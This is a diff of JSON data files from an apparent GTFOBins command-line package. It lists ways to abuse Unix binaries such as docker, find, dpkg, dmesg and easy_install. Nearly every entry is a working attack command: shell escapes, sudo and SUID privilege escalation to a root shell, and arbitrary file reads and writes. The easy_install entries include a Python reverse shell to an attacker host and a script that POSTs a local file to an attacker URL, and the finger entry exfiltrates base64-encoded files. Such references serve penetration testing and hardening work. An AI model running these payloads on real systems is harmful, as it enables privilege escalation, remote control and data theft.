gtfobins-cli 1.0.0__py3-none-any.whl

gtfo/data/dialog.json

@@ -0,0 +1,20 @@
+{
+  "description": "The file is shown in an interactive TUI dialog, thus it is not suitable for binary/too big data.",
+  "functions": {
+    "file-read": [
+      {
+        "code": "dialog --textbox \"[file]\" 0 0\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./dialog --textbox \"[file]\" 0 0\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo dialog --textbox \"[file]\" 0 0\n"
+      }
+    ]
+  }
+}

gtfo/data/diff.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "code": "diff --line-format=%L /dev/null [file]\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./diff --line-format=%L /dev/null [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo diff --line-format=%L /dev/null [file]\n"
+      }
+    ]
+  }
+}

gtfo/data/dig.json

@@ -0,0 +1,20 @@
+{
+  "description": "Each input line is treated as a lookup query for the 'dig' command and the output is corrupted with the result or errors of the operation, so this may not be suitable for binary files. Grepping for 'DiG' might help to filter out unwanted content.",
+  "functions": {
+    "file-read": [
+      {
+        "code": "dig -f [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo dig -f [file]\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./dig -f [file]\n"
+      }
+    ]
+  }
+}

gtfo/data/dmesg.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "description": "This is not suitable for binary files.",
+        "code": "dmesg -rF \"[file]\"\n"
+      }
+    ],
+    "shell": [
+      {
+        "description": "This invokes the default pager, which is likely to be 'less', other functions may apply.",
+        "code": "dmesg -H\n!/bin/sh\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "This invokes the default pager, which is likely to be 'less', other functions may apply.",
+        "code": "sudo dmesg -H\n!/bin/sh\n"
+      }
+    ]
+  }
+}

gtfo/data/dmsetup.json

@@ -0,0 +1,14 @@
+{
+  "functions": {
+    "sudo": [
+      {
+        "code": "sudo dmsetup create base <<EOF\n0 3534848 linear /dev/loop0 94208\nEOF\nsudo dmsetup ls --exec '/bin/sh -s'\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./dmsetup create base <<EOF\n0 3534848 linear /dev/loop0 94208\nEOF\n./dmsetup ls --exec '/bin/sh -p -s'\n"
+      }
+    ]
+  }
+}

gtfo/data/dnf.json

@@ -0,0 +1,10 @@
+{
+  "functions": {
+    "sudo": [
+      {
+        "description": "It runs commands using a specially crafted RPM package. Generate it with https://github.com/jordansissel/fpm and upload it to the target.\n```\nTF=$(mktemp -d)\necho 'id' > $TF/x.sh\nfpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF\n```",
+        "code": "sudo dnf install -y x-1.0-1.noarch.rpm\n"
+      }
+    ]
+  }
+}

gtfo/data/docker.json

@@ -0,0 +1,35 @@
+{
+  "description": "This requires the user to be privileged enough to run docker, i.e. being in the 'docker' group or being 'root'. Any other Docker Linux image should work, e.g., 'debian'.",
+  "functions": {
+    "shell": [
+      {
+        "description": "The resulting is a root shell.",
+        "code": "docker run -v /:/mnt --rm -it alpine chroot /mnt sh"
+      }
+    ],
+    "file-write": [
+      {
+        "description": "Write a file by copying it to a temporary container and back to the target destination on the host.",
+        "code": "CONTAINER_ID=\"$(docker run -d alpine)\" # or existing\nTF=$(mktemp)\necho \"DATA\" > $TF\ndocker cp $TF $CONTAINER_ID:$TF\ndocker cp $CONTAINER_ID:$TF [file]\n"
+      }
+    ],
+    "file-read": [
+      {
+        "description": "Read a file by copying it to a temporary container and back to a new location on the host.",
+        "code": "CONTAINER_ID=\"$(docker run -d alpine)\"  # or existing\nTF=$(mktemp)\ndocker cp file_to_read $CONTAINER_ID:$TF\ndocker cp $CONTAINER_ID:$TF $TF\ncat $TF\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "The resulting is a root shell.",
+        "code": "sudo docker run -v /:/mnt --rm -it alpine chroot /mnt sh"
+      }
+    ],
+    "suid": [
+      {
+        "description": "The resulting is a root shell.",
+        "code": "./docker run -v /:/mnt --rm -it alpine chroot /mnt sh"
+      }
+    ]
+  }
+}

gtfo/data/dpkg.json

@@ -0,0 +1,20 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "description": "This invokes the default pager, which is likely to be 'less', other functions may apply.",
+        "code": "dpkg -l\n!/bin/sh\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "This invokes the default pager, which is likely to be 'less', other functions may apply.",
+        "code": "sudo dpkg -l\n!/bin/sh\n"
+      },
+      {
+        "description": "It runs an interactive shell using a specially crafted Debian package. Generate it with https://github.com/jordansissel/fpm and upload it to the target.\n```\nTF=$(mktemp -d)\necho 'exec /bin/sh' > $TF/x.sh\nfpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF\n```",
+        "code": "sudo dpkg -i x_1.0_all.deb"
+      }
+    ]
+  }
+}

gtfo/data/dvips.json

@@ -0,0 +1,20 @@
+{
+  "description": "The 'texput.dvi' output file produced by 'tex' can be created offline and uploaded to the target.",
+  "functions": {
+    "shell": [
+      {
+        "code": "tex '\\special{psfile=\"`/bin/sh 1>&0\"}\\end'\ndvips -R0 texput.dvi\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "tex '\\special{psfile=\"`/bin/sh 1>&0\"}\\end'\nsudo dvips -R0 texput.dvi\n"
+      }
+    ],
+    "limited-suid": [
+      {
+        "code": "tex '\\special{psfile=\"`/bin/sh 1>&0\"}\\end'\n./dvips -R0 texput.dvi\n"
+      }
+    ]
+  }
+}

gtfo/data/easy_install.json

@@ -0,0 +1,53 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "TF=$(mktemp -d)\necho \"import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')\" > $TF/setup.py\neasy_install $TF\n"
+      }
+    ],
+    "reverse-shell": [
+      {
+        "description": "Run 'socat file:`tty`,raw,echo=0 tcp-listen:[port]' on the attacker box to receive the shell.",
+        "code": "TF=$(mktemp -d)\necho 'import sys,socket,os,pty;s=socket.socket()\ns.connect((\"[host]\",[port]))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")' > $TF/setup.py\neasy_install $TF\n"
+      }
+    ],
+    "file-upload": [
+      {
+        "description": "Send local file via 'd' parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file. The file path must be absolute.",
+        "code": "TF=$(mktemp -d)\necho 'import sys;\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(\"[url]\", bytes(u.urlencode({\"d\":open(\"[file]\").read()}).encode()))' > $TF/setup.py\neasy_install $TF\n"
+      },
+      {
+        "description": "Serve files in the local folder running an HTTP server. ",
+        "code": "TF=$(mktemp -d)\necho 'import sys; from os import environ as e\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", [port]), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py\neasy_install $TF\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "Fetch a remote file via HTTP GET request. The file path must be absolute.",
+        "code": "TF=$(mktemp -d)\necho \"import os;\nos.execl('$(whereis python)', '$(whereis python)', '-c', \\\"\\\"\\\"import sys;\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve('[url]', '[file]')\\\"\\\"\\\")\" > $TF/setup.py\npip install $TF\n"
+      }
+    ],
+    "file-write": [
+      {
+        "description": "The file path must be absolute.",
+        "code": "TF=$(mktemp -d)\necho \"import os;\nos.execl('$(whereis python)', 'python', '-c', 'open(\\\"[file]\\\",\\\"w+\\\").write(\\\"DATA\\\")')\" > $TF/setup.py\neasy_install $TF\n"
+      }
+    ],
+    "file-read": [
+      {
+        "description": "The read file content is wrapped within program messages. The file path must be absolute.",
+        "code": "TF=$(mktemp -d)\necho 'print(open(\"[file]\").read())' > $TF/setup.py\neasy_install $TF\n"
+      }
+    ],
+    "library-load": [
+      {
+        "code": "TF=$(mktemp -d)\necho 'from ctypes import cdll; cdll.LoadLibrary(\"lib.so\")' > $TF/setup.py\neasy_install $TF\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "TF=$(mktemp -d)\necho \"import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')\" > $TF/setup.py\nsudo easy_install $TF\n"
+      }
+    ]
+  }
+}

gtfo/data/eb.json

@@ -0,0 +1,15 @@
+{
+  "description": "This invokes the default logging service, which is likely to be 'journalctl', other functions may apply. For this to work the target must be connected to AWS instance via EB-CLI.",
+  "functions": {
+    "shell": [
+      {
+        "code": "eb logs\n!/bin/sh\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo eb logs\n!/bin/sh\n"
+      }
+    ]
+  }
+}

gtfo/data/ed.json

@@ -0,0 +1,34 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "ed\n!/bin/sh\n"
+      }
+    ],
+    "file-write": [
+      {
+        "code": "ed [file]\na\nDATA\n.\nw\nq\n"
+      }
+    ],
+    "file-read": [
+      {
+        "code": "ed [file]\n,p\nq\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./ed [file]\n,p\nq\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo ed\n!/bin/sh\n"
+      }
+    ],
+    "limited-suid": [
+      {
+        "code": "./ed\n!/bin/sh\n"
+      }
+    ]
+  }
+}

gtfo/data/emacs.json

@@ -0,0 +1,29 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "emacs -Q -nw --eval '(term \"/bin/sh\")'"
+      }
+    ],
+    "file-write": [
+      {
+        "code": "emacs [file]\nDATA\nC-x C-s\n"
+      }
+    ],
+    "file-read": [
+      {
+        "code": "emacs [file]"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./emacs -Q -nw --eval '(term \"/bin/sh -p\")'"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo emacs -Q -nw --eval '(term \"/bin/sh\")'"
+      }
+    ]
+  }
+}

gtfo/data/env.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "env /bin/sh"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./env /bin/sh -p"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo env /bin/sh"
+      }
+    ]
+  }
+}

gtfo/data/eqn.json

@@ -0,0 +1,20 @@
+{
+  "description": "The content is actually parsed and corrupted by the command, thus it may not be suitable for arbitrary files.",
+  "functions": {
+    "file-read": [
+      {
+        "code": "eqn \"[file]\"\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./eqn \"[file]\"\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo eqn \"[file]\"\n"
+      }
+    ]
+  }
+}

gtfo/data/ex.json

@@ -0,0 +1,24 @@
+{
+    "functions": {
+      "shell": [
+        {
+          "code": "ex\n!/bin/sh\n"
+        }
+      ],
+      "file-write": [
+        {
+          "code": "ex [file]\na\nDATA\n.\nw\nq\n"
+        }
+      ],
+      "file-read": [
+        {
+          "code": "ex [file]\n,p\nq\n"
+        }
+      ],
+      "sudo": [
+        {
+          "code": "sudo ex\n!/bin/sh\n"
+        }
+      ]
+    }
+  }

gtfo/data/exiftool.json

@@ -0,0 +1,20 @@
+{
+  "description": "If the permissions allow it, files are moved (instead of copied) to the destination.\n",
+  "functions": {
+    "file-read": [
+      {
+        "code": "exiftool -filename=[output] [file]\ncat [output]\n"
+      }
+    ],
+    "file-write": [
+      {
+        "code": "exiftool -filename=[file] [input]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo exiftool -filename=[file] [input]\n"
+      }
+    ]
+  }
+}

gtfo/data/expand.json

@@ -0,0 +1,20 @@
+{
+  "description": "The read file content is corrupted by replacing tabs with spaces.",
+  "functions": {
+    "file-read": [
+      {
+        "code": "expand \"[file]\"\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./expand \"[file]\"\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo expand \"[file]\"\n"
+      }
+    ]
+  }
+}

gtfo/data/expect.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "expect -c 'spawn /bin/sh;interact'"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./expect -c 'spawn /bin/sh -p;interact'"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo expect -c 'spawn /bin/sh;interact'"
+      }
+    ]
+  }
+}

gtfo/data/facter.json

@@ -0,0 +1,14 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "TF=$(mktemp -d)\necho 'exec(\"/bin/sh\")' > $TF/x.rb\nFACTERLIB=$TF facter\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "TF=$(mktemp -d)\necho 'exec(\"/bin/sh\")' > $TF/x.rb\nsudo FACTERLIB=$TF facter\n"
+      }
+    ]
+  }
+}

gtfo/data/file.json

@@ -0,0 +1,26 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "description": "Each input line is treated as a filename for the 'file' command and the output is corrupted by a suffix ':' followed by the result or the error of the operation, so this may not be suitable for binary files.",
+        "code": "file -f [file]\n"
+      },
+      {
+        "description": "Each line is corrupted by a prefix string and wrapped inside quotes, so this may not be suitable for binary files. If a line in the target file begins with a '#', it will not be printed as these lines are parsed as comments. It can also be provided with a directory and will read each file in the directory.",
+        "code": "file -m [file]\n"
+      }
+    ],
+    "suid": [
+      {
+        "description": "Each input line is treated as a filename for the 'file' command and the output is corrupted by a suffix ':' followed by the result or the error of the operation, so this may not be suitable for binary files.",
+        "code": "./file -f [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "Each input line is treated as a filename for the 'file' command and the output is corrupted by a suffix ':' followed by the result or the error of the operation, so this may not be suitable for binary files.",
+        "code": "sudo file -f [file]\n"
+      }
+    ]
+  }
+}

gtfo/data/find.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "find . -exec /bin/sh \\; -quit"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./find . -exec /bin/sh -p \\; -quit"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo find . -exec /bin/sh \\; -quit"
+      }
+    ]
+  }
+}

gtfo/data/finger.json

@@ -0,0 +1,17 @@
+{
+  "description": "'finger' hangs waiting for the remote peer to close the socket.",
+  "functions": {
+    "file-upload": [
+      {
+        "description": "Send a binary file to a TCP port. Run 'sudo nc -l -p 79 | base64 -d > [file]' on the attacker box to collect the file. The file length is limited by the maximum size of arguments.",
+        "code": "finger \"$(base64 [file])@[host]\"\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "Fetch remote binary file from a remote TCP port. Run 'base64 [file] | sudo nc -l -p 79' on the attacker box to send the file.",
+        "code": "finger x@[host] | base64 -d > [file]\n"
+      }
+    ]
+  }
+}

gtfo/data/flock.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "flock -u / /bin/sh"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./flock -u / /bin/sh -p"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo flock -u / /bin/sh"
+      }
+    ]
+  }
+}

gtfo/data/fmt.json

@@ -0,0 +1,27 @@
+{
+  "description": "The read file content is not binary-safe.",
+  "functions": {
+    "file-read": [
+      {
+        "description": "This only works for the GNU version of `fmt`.",
+        "code": "fmt -pNON_EXISTING_PREFIX [file]\n"
+      },
+      {
+        "description": "This corrupts the output by wrapping very long lines at the given width.",
+        "code": "fmt -999 [file]\n"
+      }
+    ],
+    "suid": [
+      {
+        "description": "This corrupts the output by wrapping very long lines at the given width.",
+        "code": "./fmt -999 [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "This corrupts the output by wrapping very long lines at the given width.",
+        "code": "sudo fmt -999 [file]\n"
+      }
+    ]
+  }
+}

gtfo/data/fold.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "code": "fold -w99999999 [file]\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./fold -w99999999 [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo fold -w99999999 [file]\n"
+      }
+    ]
+  }
+}

gtfo/data/ftp.json

@@ -0,0 +1,26 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "ftp\n!/bin/sh\n"
+      }
+    ],
+    "file-upload": [
+      {
+        "description": "Send local file to a FTP server.",
+        "code": "ftp [host]\nput [file]\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "Fetch a remote file from a FTP server.",
+        "code": "ftp [host]\nget [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo ftp\n!/bin/sh\n"
+      }
+    ]
+  }
+}